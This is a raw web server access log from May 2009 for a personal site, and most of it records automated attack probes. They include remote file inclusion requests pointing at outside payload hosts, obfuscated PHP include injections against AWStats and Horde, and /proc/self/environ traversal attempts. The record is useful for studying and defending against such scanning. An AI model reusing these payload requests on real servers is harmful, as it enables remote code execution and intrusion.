194.126.110.134 - - [19/May/2009:09:46:13 -0700] "GET /logs/access_080617.log%20%20//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.126.110.134 - - [19/May/2009:09:46:13 -0700] "GET /logs/access_080522.log%20%20//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:09:46:36 -0700] "GET /logs/access_080619.log%20%20/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.52.230.168 - - [19/May/2009:09:46:36 -0700] "GET /logs/access_080925.log%20%20/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.28.103.46 - - [19/May/2009:09:46:43 -0700] "GET /logs/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.28.103.46 - - [19/May/2009:09:46:43 -0700] "GET /logs/access_080222.log/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [19/May/2009:09:46:45 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.41 - - [19/May/2009:09:47:02 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
78.40.224.155 - - [19/May/2009:09:47:17 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.11.230.36 - - [19/May/2009:09:47:20 -0700] "GET /logs/access_080902.log///vwar/backup/errors.php?error=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
78.40.224.155 - - [19/May/2009:09:47:21 -0700] "GET /logs/access_080611.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.40.224.155 - - [19/May/2009:09:47:21 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.28.103.46 - - [19/May/2009:09:47:27 -0700] "GET /index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 200 42017 "-" "Mozilla/5.0" "www.dmulk.com"
66.11.230.36 - - [19/May/2009:09:47:27 -0700] "GET /logs/access_081021.log///vwar/backup/errors.php?error=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.245.253.18 - - [19/May/2009:09:47:57 -0700] "GET /logs/access_081113.log//cgi-bin/awstats/awstats.pl/?configdir=%7Cphp%20-r%20%22include(%5C%22http%5C%22.chr(58).chr(47).chr(47).%5C%22voo%5C%22.chr(46).%5C%22owned%5C%22.chr(46).%5C%22lt%5C%22.chr(47).%5C%22sp%5C%22.chr(47).%5C%22tb01%5C%22.chr(46).%5C%22txt%5C%22);%22;%7C HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.245.253.18 - - [19/May/2009:09:47:57 -0700] "GET /logs/access_081113.log//cgi-bin/awstats/awstats.pl/?configdir=%7Cphp%20-r%20%22include(%5C%22http%5C%22.chr(58).chr(47).chr(47).%5C%22voo%5C%22.chr(46).%5C%22owned%5C%22.chr(46).%5C%22lt%5C%22.chr(47).%5C%22sp%5C%22.chr(47).%5C%22tb01%5C%22.chr(46).%5C%22txt%5C%22);%22;%7C HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.245.253.18 - - [19/May/2009:09:47:57 -0700] "GET /cgi-bin/awstats/awstats.pl/?configdir=%7Cphp%20-r%20%22include(%5C%22http%5C%22.chr(58).chr(47).chr(47).%5C%22voo%5C%22.chr(46).%5C%22owned%5C%22.chr(46).%5C%22lt%5C%22.chr(47).%5C%22sp%5C%22.chr(47).%5C%22tb01%5C%22.chr(46).%5C%22txt%5C%22);%22;%7C HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.245.253.18 - - [19/May/2009:09:47:57 -0700] "GET /cgi-bin/awstats/awstats.pl/?configdir=%7Cphp%20-r%20%22include(%5C%22http%5C%22.chr(58).chr(47).chr(47).%5C%22voo%5C%22.chr(46).%5C%22owned%5C%22.chr(46).%5C%22lt%5C%22.chr(47).%5C%22sp%5C%22.chr(47).%5C%22tb01%5C%22.chr(46).%5C%22txt%5C%22);%22;%7C HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.245.253.18 - - [19/May/2009:09:47:58 -0700] "GET /logs//cgi-bin/awstats/awstats.pl/?configdir=%7Cphp%20-r%20%22include(%5C%22http%5C%22.chr(58).chr(47).chr(47).%5C%22voo%5C%22.chr(46).%5C%22owned%5C%22.chr(46).%5C%22lt%5C%22.chr(47).%5C%22sp%5C%22.chr(47).%5C%22tb01%5C%22.chr(46).%5C%22txt%5C%22);%22;%7C HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.245.253.18 - - [19/May/2009:09:47:58 -0700] "GET /logs//cgi-bin/awstats/awstats.pl/?configdir=%7Cphp%20-r%20%22include(%5C%22http%5C%22.chr(58).chr(47).chr(47).%5C%22voo%5C%22.chr(46).%5C%22owned%5C%22.chr(46).%5C%22lt%5C%22.chr(47).%5C%22sp%5C%22.chr(47).%5C%22tb01%5C%22.chr(46).%5C%22txt%5C%22);%22;%7C HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:09:48:27 -0700] "GET //skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:09:48:27 -0700] "GET /logs/access_080411.log///skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:09:48:27 -0700] "GET /logs///skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:09:48:31 -0700] "GET /logs/access_080411.log///skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:09:48:31 -0700] "GET //skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:09:48:31 -0700] "GET /logs///skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:09:48:51 -0700] "GET /index2.php?showpage=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:09:48:51 -0700] "GET /logs/access_081213.log/index2.php?showpage=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:09:48:51 -0700] "GET /logs/index2.php?showpage=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.151.224.239 - - [19/May/2009:09:48:52 -0700] "GET /logs/access_080524.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.byufolkdance.com/foto.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
209.151.224.239 - - [19/May/2009:09:48:52 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.byufolkdance.com/foto.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
209.151.224.239 - - [19/May/2009:09:48:52 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.byufolkdance.com/foto.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
209.151.224.239 - - [19/May/2009:09:48:52 -0700] "GET /logs/access_081124.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.byufolkdance.com/foto.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:09:48:52 -0700] "GET /logs/access_080425.log///skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.228.18 - - [19/May/2009:09:48:55 -0700] "GET /logs/access_080425.log///skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:09:48:55 -0700] "GET /logs/access_081015.log/index2.php?showpage=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.154.225 - - [19/May/2009:09:49:09 -0700] "GET /logs/appserv/main.php?appserv_root=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
65.23.154.225 - - [19/May/2009:09:49:09 -0700] "GET /appserv/main.php?appserv_root=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
65.23.154.225 - - [19/May/2009:09:49:09 -0700] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
65.23.154.225 - - [19/May/2009:09:49:09 -0700] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
65.23.154.225 - - [19/May/2009:09:49:09 -0700] "GET /logs/access_081107.log/appserv/main.php?appserv_root=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
65.23.154.225 - - [19/May/2009:09:49:09 -0700] "GET /logs/appserv/main.php?appserv_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [19/May/2009:09:49:10 -0700] "GET /appserv/main.php?appserv_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [19/May/2009:09:49:10 -0700] "GET /logs/access_081107.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
65.23.154.225 - - [19/May/2009:09:49:10 -0700] "GET /logs/appserv/main.php?appserv_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [19/May/2009:09:49:10 -0700] "GET /appserv/main.php?appserv_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [19/May/2009:09:49:10 -0700] "GET /logs/access_081107.log/appserv/main.php?appserv_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [19/May/2009:09:49:10 -0700] "GET /logs/access_081107.log/appserv/main.php?appserv_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [19/May/2009:09:49:11 -0700] "GET /logs/access_080720.log/appserv/main.php?appserv_root=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
65.23.154.225 - - [19/May/2009:09:49:11 -0700] "GET /logs/access_080720.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
65.23.154.225 - - [19/May/2009:09:49:11 -0700] "GET /logs/access_080720.log/appserv/main.php?appserv_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [19/May/2009:09:49:11 -0700] "GET /logs/access_080720.log/appserv/main.php?appserv_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:09:49:13 -0700] "GET /logs/access_080923.log%20%20//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:09:49:13 -0700] "GET /logs//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 100196 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:09:49:13 -0700] "GET /logs/access_080923.log%20%20//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:09:49:13 -0700] "GET /logs//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 100196 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:09:49:16 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:09:49:16 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
194.126.110.134 - - [19/May/2009:09:49:16 -0700] "GET /logs/access_090203.log//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [19/May/2009:09:49:18 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.172.33.230 - - [19/May/2009:09:49:18 -0700] "GET /logs/access_080611.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:09:49:23 -0700] "GET /logs/access_081230.log%20%20//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.172.33.230 - - [19/May/2009:09:49:23 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.raindrip.com/cms/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:09:49:23 -0700] "GET /logs/access_081230.log%20%20//?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:09:49:30 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:09:49:31 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
201.28.103.46 - - [19/May/2009:09:49:34 -0700] "GET /logs/access_080925.log/index.php?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.151.224.239 - - [19/May/2009:09:49:54 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.byufolkdance.com/foto.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:09:49:54 -0700] "GET /?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.1" 200 42077 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [19/May/2009:09:49:56 -0700] "GET /?_zb_path=http://jeta.co.kr//bbs/component/.jpg/fx29id.txt?? HTTP/1.0" 200 42061 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:09:50:13 -0700] "GET /logs/access_081015.log%20%20/index2.php?showpage=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.26.5 - - [19/May/2009:09:50:13 -0700] "GET /logs/access_081213.log%20%20/index2.php?showpage=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.191.102.117 - - [19/May/2009:09:50:20 -0700] "GET /logs/includes/pafiledb_constants.php?module_root_path=http://www.challenger.com.co/colombia//components/com_virtuemart/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.191.102.117 - - [19/May/2009:09:50:20 -0700] "GET /logs/access_080422.log%20%20/includes/pafiledb_constants.php?module_root_path=http://www.challenger.com.co/colombia//components/com_virtuemart/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.191.102.117 - - [19/May/2009:09:50:20 -0700] "GET /includes/pafiledb_constants.php?module_root_path=http://www.challenger.com.co/colombia//components/com_virtuemart/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.245.253.18 - - [19/May/2009:09:50:27 -0700] "GET /logs/access_081018.log//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27voo.owned.lt%27.chr(47).%27sp%27.chr(47).%27tc.v%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.245.253.18 - - [19/May/2009:09:50:27 -0700] "GET /logs/access_081018.log//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27voo.owned.lt%27.chr(47).%27sp%27.chr(47).%27tc.v%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.245.253.18 - - [19/May/2009:09:50:27 -0700] "GET /horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27voo.owned.lt%27.chr(47).%27sp%27.chr(47).%27tc.v%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.245.253.18 - - [19/May/2009:09:50:27 -0700] "GET /horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27voo.owned.lt%27.chr(47).%27sp%27.chr(47).%27tc.v%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.245.253.18 - - [19/May/2009:09:50:28 -0700] "GET /logs//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27voo.owned.lt%27.chr(47).%27sp%27.chr(47).%27tc.v%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.245.253.18 - - [19/May/2009:09:50:28 -0700] "GET /logs//horde/services/help/?show=about&module=;%22.include(%27http:%27.chr(47).chr(47).%27voo.owned.lt%27.chr(47).%27sp%27.chr(47).%27tc.v%27); HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.191.102.117 - - [19/May/2009:09:51:01 -0700] "GET /logs/access_071121.log%20%20/includes/pafiledb_constants.php?module_root_path=http://www.challenger.com.co/colombia//components/com_virtuemart/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
110.45.145.92 - - [19/May/2009:09:51:57 -0700] "GET /logs/access_080906.log/common/func.php?CommonAbsDir=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
110.45.145.92 - - [19/May/2009:09:51:57 -0700] "GET /common/func.php?CommonAbsDir=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
110.45.145.92 - - [19/May/2009:09:51:59 -0700] "GET /logs/common/func.php?CommonAbsDir=http://www.jigangdoyo.com/web_logs/iyoshells/CMD.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
115.137.197.60 - - [19/May/2009:09:52:06 -0700] "GET /logs/access_080524.log/main.php?sayfa=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
115.137.197.60 - - [19/May/2009:09:52:06 -0700] "GET /main.php?sayfa=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
115.137.197.60 - - [19/May/2009:09:52:06 -0700] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
115.137.197.60 - - [19/May/2009:09:52:06 -0700] "GET /logs/access_080524.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
115.137.197.60 - - [19/May/2009:09:52:06 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
115.137.197.60 - - [19/May/2009:09:52:07 -0700] "GET /logs/access_080524.log/main.php?sayfa=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
115.137.197.60 - - [19/May/2009:09:52:07 -0700] "GET /main.php?sayfa=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
115.137.197.60 - - [19/May/2009:09:52:07 -0700] "GET /logs/access_080524.log/main.php?sayfa=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
115.137.197.60 - - [19/May/2009:09:52:24 -0700] "GET /logs/main.php?sayfa=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
115.137.197.60 - - [19/May/2009:09:52:24 -0700] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
115.137.197.60 - - [19/May/2009:09:52:25 -0700] "GET /logs/main.php?sayfa=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
115.137.197.60 - - [19/May/2009:09:52:26 -0700] "GET /logs/main.php?sayfa=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
115.137.197.60 - - [19/May/2009:09:52:45 -0700] "GET /logs/access_080615.log/main.php?sayfa=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
115.137.197.60 - - [19/May/2009:09:52:45 -0700] "GET /logs/access_080615.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
115.137.197.60 - - [19/May/2009:09:52:46 -0700] "GET /logs/access_080615.log/main.php?sayfa=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
115.137.197.60 - - [19/May/2009:09:52:46 -0700] "GET /logs/access_080615.log/main.php?sayfa=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
128.2.204.134 - - [19/May/2009:09:52:47 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "PrivacyFinder/1.1" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:09:52:51 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
66.11.230.36 - - [19/May/2009:09:52:53 -0700] "GET /logs/access_081027.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.11.230.36 - - [19/May/2009:09:52:53 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.11.230.36 - - [19/May/2009:09:52:54 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:09:53:04 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
66.11.230.36 - - [19/May/2009:09:53:08 -0700] "GET /logs/access_081107.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
151.1.154.24 - - [19/May/2009:09:53:18 -0700] "GET /logs/access_070724.log//index.php?lang=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:09:53:18 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
151.1.154.24 - - [19/May/2009:09:53:23 -0700] "GET /logs//index.php?lang=http://www.graal-plus.zp.ua//images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
